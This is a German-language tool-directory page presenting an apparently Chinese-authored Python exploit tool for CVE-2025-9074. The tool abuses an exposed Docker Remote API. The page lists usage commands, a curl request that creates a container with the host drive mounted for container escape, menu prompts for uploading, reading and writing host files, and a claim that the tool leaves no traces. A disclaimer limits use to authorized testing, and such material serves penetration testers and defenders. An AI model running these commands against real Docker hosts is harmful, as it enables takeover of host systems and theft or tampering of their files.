Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-9074-Docker-Exploit — 一个功能强大的 Docker 远程 API 漏洞利用工具,用于 CVE-2025-9074 漏洞的安全研究和测试。 | Kitploit
Tools/GitHubGitHub/shaoshi17/cve-2025-9074-docker-exploit
Container SecurityVulnerability AnalysisExploitationPenetration TestingCloud SecurityRed TeamingContainer Escape
GitHubshaoshi17/cve-2025-9074-docker-exploit

CVE-2025-9074-Docker-Exploit

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

一个功能强大的 Docker 远程 API 漏洞利用工具,用于 CVE-2025-9074 漏洞的安全研究和测试。

Repository anzeigen
12vor 7 MonatenNoch nicht geprüft

CVE-2025-9074 Docker-Container-Befehlsausführungstool

Ein leistungsstarkes Tool zur Ausnutzung der Docker Remote API für die Sicherheitsforschung und das Testen der Schwachstelle CVE-2025-9074.

Hauptvorteile

✅ Vollautomatisches Container-Lebenszyklus-Management: Automatische Erstellung temporärer Container, automatische Bereinigung nach Abschluss des Vorgangs, keine Spuren hinterlassen
✅ Intelligente Pfadverarbeitung: Automatische Erkennung und Konvertierung von Windows-Pfaden in das Docker-Mount-Format
✅ Vollständig automatisierter Arbeitsablauf: Keine manuelle Eingabe komplexer Befehle erforderlich, menügesteuerte Interaktion, Dateivorgänge mit einem Klick
✅ Plattformübergreifend: Perfekte Unterstützung für Windows- und Linux-Systeme

Screenshot einiger Funktionen

image

Funktionsmerkmale

  • Container-Operationen

    • Laufende Container anzeigen
    • Alle Container anzeigen (einschließlich gestoppter)
    • Neuen Container erstellen
    • Container stoppen
    • Container löschen
    • Einmalige Befehlsausführung
    • Interaktives Terminal (erfordert docker-Bibliothek)
  • Image-Verwaltung

    • Lokale Images anzeigen
    • Neues Image pullen
    • Image löschen
  • Dateioperationen auf dem Host

    • Datei auf den Host hochladen
    • Datei vom Host herunterladen
    • Inhalt einer Datei auf dem Host lesen
    • Datei auf dem Host schreiben
    • Automatische Verarbeitung der Windows Docker Desktop-Pfadzuordnung

Schwachstellenbeschreibung

CVE-2025-9074 ist eine Sicherheitslücke in der Docker Remote API. Ein Angreifer kann durch nicht autorisierten Zugriff auf die Docker API Folgendes tun:

  • Beliebige Befehle ausführen
  • Container erstellen und Host-Festplatten einbinden
  • Container-Ausbruch erreichen
  • Host-Dateien lesen/schreiben

Systemvoraussetzungen

  • Python 3.6+

Abhängigkeiten installieren

Installieren Sie alle Abhängigkeiten mit der requirements.txt:

root@kitploit:~
pip install -r requirements.txt

Oder manuelle Installation:

root@kitploit:~
pip install requests docker websocket-client

Verwendung

Grundlegende Verwendung

Führen Sie das Skript direkt mit der Standard-Docker-API-Adresse aus:

root@kitploit:~
python CVE-2025-9074-docker-exploit.py

Benutzerdefinierte Docker-API-Adresse

root@kitploit:~
python CVE-2025-9074-docker-exploit.py -u http://192.168.1.100:2375

Befehlszeilenargumente

root@kitploit:~
python CVE-2025-9074-docker-exploit.py [Optionen]

Optionen:
  -u, --url URL         Docker-API-Adresse (Standard: http://192.168.65.7:2375)

Detaillierte Funktionsbeschreibung

Container-Operationen

  1. Laufende Container anzeigen: Zeigt eine Liste aller laufenden Container an
  2. Alle Container anzeigen: Zeigt alle Container an (einschließlich gestoppter)
  3. Neuen Container erstellen: Erstellt einen neuen Container mit einem bestimmten Image
  4. Container stoppen: Stoppt einen laufenden Container
  5. Container löschen: Löscht einen Container (ggf. mit Zwang)
  6. Einmalige Befehlsausführung: Führt einen einzelnen Befehl im Container aus
  7. Interaktives Terminal: Öffnet eine interaktive Shell im Container (erfordert docker-Bibliothek)

Interaktives Terminal verwenden

  1. Nach dem Start des Skripts wählen Sie „1. Container-Operationen"
  2. Wählen Sie „1. Laufende Container anzeigen"
  3. Geben Sie die Containernummer ein, um einen Container auszuwählen
  4. Wählen Sie „2. Interaktives Terminal (erfordert docker-Bibliothek)"
  5. Geben Sie den Shell-Befehl ein (Standard: /bin/sh)
  6. Beginnen Sie mit der interaktiven Bedienung

Image-Verwaltung

  1. Images anzeigen: Listet alle lokalen Images auf
  2. Image pullen: Pullen ein neues Image von Docker Hub
  3. Image löschen: Löscht ein lokales Image

Dateioperationen auf dem Host

Datei auf den Host hochladen

root@kitploit:~
1. Datei auf den Host hochladen
Bitte geben Sie den lokalen Dateipfad ein: /path/to/local/file.txt
Bitte geben Sie das Zielverzeichnis auf dem Host ein: D:/temp
Bitte geben Sie den Ziel-Dateinamen ein (leer lassen für Originalnamen):

Datei vom Host herunterladen

root@kitploit:~
2. Datei vom Host herunterladen
Bitte geben Sie den Dateipfad auf dem Host ein: D:/temp/file.txt
Bitte geben Sie den lokalen Speicherpfad ein: /tmp

Inhalt einer Datei auf dem Host lesen

root@kitploit:~
3. Inhalt einer Datei auf dem Host lesen
Bitte geben Sie den Dateipfad auf dem Host ein: D:/temp/file.txt

Datei auf dem Host schreiben

root@kitploit:~
4. Datei auf dem Host schreiben
Bitte geben Sie das Zielverzeichnis auf dem Host ein: D:/temp
Bitte geben Sie den Dateiinhalt ein: Hello, World!

Windows Docker Desktop-Pfadzuordnung

Dieses Tool verarbeitet automatisch die Pfadzuordnung von Windows Docker Desktop:

Windows-Pfad

Unterstützte Eingabeformate:

  • D:\ oder D:/
  • D:\temp oder D:/temp
  • "D:\file.txt" (mit Anführungszeichen)
  • 'D:/file.txt' (mit Anführungszeichen)

Sicherheitshinweise

⚠️ Wichtiger Hinweis:

  1. Nur für autorisierte Tests: Dieses Tool ist ausschließlich für autorisierte Sicherheitstests und Bildungszwecke bestimmt
  2. Rechtliche Konformität: Stellen Sie vor der Verwendung sicher, dass Sie die ausdrückliche Genehmigung des Zielsystems haben
  3. Isolierte Umgebung: Es wird empfohlen, das Tool in einer isolierten Testumgebung zu verwenden
  4. Berechtigungen: Windows Docker Desktop benötigt Administratorrechte, um auf das Laufwerk C: schreiben zu können
  5. Kein Missbrauch: Die unbefugte Nutzung dieses Tools kann gegen Gesetze und Vorschriften verstoßen

Technisches Prinzip

Container-Ausbruch

Erstellen eines Containers über die Docker API und Einbinden der Host-Festplatte:

root@kitploit:~
curl -X POST "http://<target>:2375/containers/create" \
  -H "Content-Type: application/json" \
  -d '{
    "Image": "python:3.11.7",
    "Cmd": ["sleep", "999d"],
    "HostConfig": {
      "Binds": ["/mnt/host/d:/tmp"]
    },
    "Tty": true
  }'

Dateien lesen/schreiben

Lesen und Schreiben von Host-Dateien durch Ausführen von Befehlen im Container:

root@kitploit:~
# Datei schreiben
echo "content" > /tmp/file.txt

# Datei lesen
cat /tmp/file.txt

Fehlerbehebung

Container-Erstellung fehlgeschlagen (Fehler 500)

  • Überprüfen Sie, ob die Docker-API erreichbar ist
  • Stellen Sie sicher, dass das Pfadformat korrekt ist
  • Überprüfen Sie, ob das Image vorhanden ist

Dateischreiben fehlgeschlagen

  • Windows Docker Desktop muss mit Administratorrechten ausgeführt werden
  • Überprüfen Sie die Berechtigungen des Zielverzeichnisses

Interaktives Terminal startet nicht

  • Stellen Sie sicher, dass die docker-Bibliothek installiert ist: pip install docker websocket-client
  • Überprüfen Sie, ob das Terminal den interaktiven Modus unterstützt

Entwicklung und Test

Tests ausführen

root@kitploit:~
python CVE-2025-9074-docker-exploit.py

Codestruktur

root@kitploit:~
CVE-2025-9074-docker-exploit.py
├── Container-Verwaltungsfunktionen
│   ├── get_containers()
│   ├── display_containers()
│   ├── create_container()
│   ├── stop_container()
│   └── delete_container()
├── Image-Verwaltungsfunktionen
│   ├── get_images()
│   ├── display_images()
│   ├── pull_image()
│   └── remove_image()
├── Host-Dateioperationsfunktionen
│   ├── upload_file_to_host()
│   ├── download_file_from_host()
│   ├── read_file_from_host()
│   └── write_file_to_host()
└── Hilfsfunktionen
    ├── normalize_host_path()
    ├── create_container_with_mount()
    ├── start_container()
    └── stop_and_remove_container()

Mitwirken

Issue- und Pull-Request-Einreichungen sind willkommen!

Lizenz

Dieses Projekt dient ausschließlich Bildungs- und Sicherheitsforschungszwecken.

Haftungsausschluss

Dieses Tool ist nur für autorisierte Sicherheitstests und Bildungszwecke bestimmt. Der Benutzer trägt die alleinige Verantwortung und das Risiko bei der Nutzung dieses Tools. Der Autor übernimmt keine Haftung für Missbrauch oder unbefugte Nutzung dieses Tools.

Referenzen

  • Details zur Schwachstelle CVE-2025-9074
  • Docker Remote API Dokumentation
  • Windows Docker Desktop-Pfadzuordnungsregeln
Tool herunterladen
Docker-Mount-Pfad
D:\/mnt/host/d
D:\temp/mnt/host/d/temp
C:\Windows/mnt/host/c/Windows
C:\Users\test/mnt/host/c/Users/test